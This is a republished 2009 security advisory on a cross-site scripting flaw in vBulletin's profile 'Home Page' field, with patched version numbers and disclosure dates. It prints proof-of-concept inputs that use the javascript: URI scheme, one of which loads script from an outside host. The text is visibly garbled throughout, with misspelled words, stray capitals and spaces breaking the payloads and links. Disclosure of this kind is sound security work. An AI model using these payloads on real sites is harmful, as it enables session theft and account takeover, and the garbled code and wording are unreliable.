VBB 3.8.4 XSS

Source: Internet
Author: User

VBulletin-Cross Site Script Redirection


Versions Affected: 3.8.4/3.7.6/3.6.12
Patches Available: 3.8.4PL1/3.7.6PL1/3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This coshould allow an attacker to carry out an action as a user or obtain
Access to a users account. To resolve this issue, it has been necessary
Release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases-simply
Download the patch from the Members Area, extract the files and upload
Your webserver, overwriting the existing files. There is no upgrade script
Required.

As with all security-based releases, we recommend that all customers
Upgrade as soon as possible in order to prevent any potential damage
Resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft ?)

Researched & Disclosed by: MaXe (InterN0T.net)

References:
Http://www.vbulletin.com/forum/showthread.php? T = 319572


The Advisory

Quote:
The "Home Page" field in the user profile was only checking the user input
For either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 +: // will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars (),
However before the patch it did not check if a user wocould create a link that
Wocould send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
-90 character limit
-Characters will be converted to html entities.
-We can only use the data or javascript URI scheme.

This means that we shoshould avoid "since that becomes & quot;... The other
Characters like <will become & lt; which is % 3C which is almost the same.
Please see how htmlentities () and htmlspecialchars () works in PHP.

The following scheme input as home page will alert 0:
Javascript: // % 0adocument. write (<script> alert (0) </script>)

The following scheme is a Proof of Concept that external Javascript can be loaded:
Javascript: // % 0adocument. write (<script src = http://intern0t.net/.k> </script>)

The following URL contains a working Proof of Concept on the Contact Page:
Html "> http://forum.intern0t.net/members/maxe.html (will be removed soon)

Solution
Update to the newest version of vBulletin-3.8.4PL1/3.7.6PL1/3.6.12PL1


Conclusion
VBulletin is generally a safe and secure platform to use for large forums.
This security hole/exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information!

Disclosure Information:
-Unknown date of when the vendor found the security hole.
-Vendor released patch on the 7th October 2009.
-Security hole researched and disclosed on 8th October 2009.


All of the best,
MaXe
__________________

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.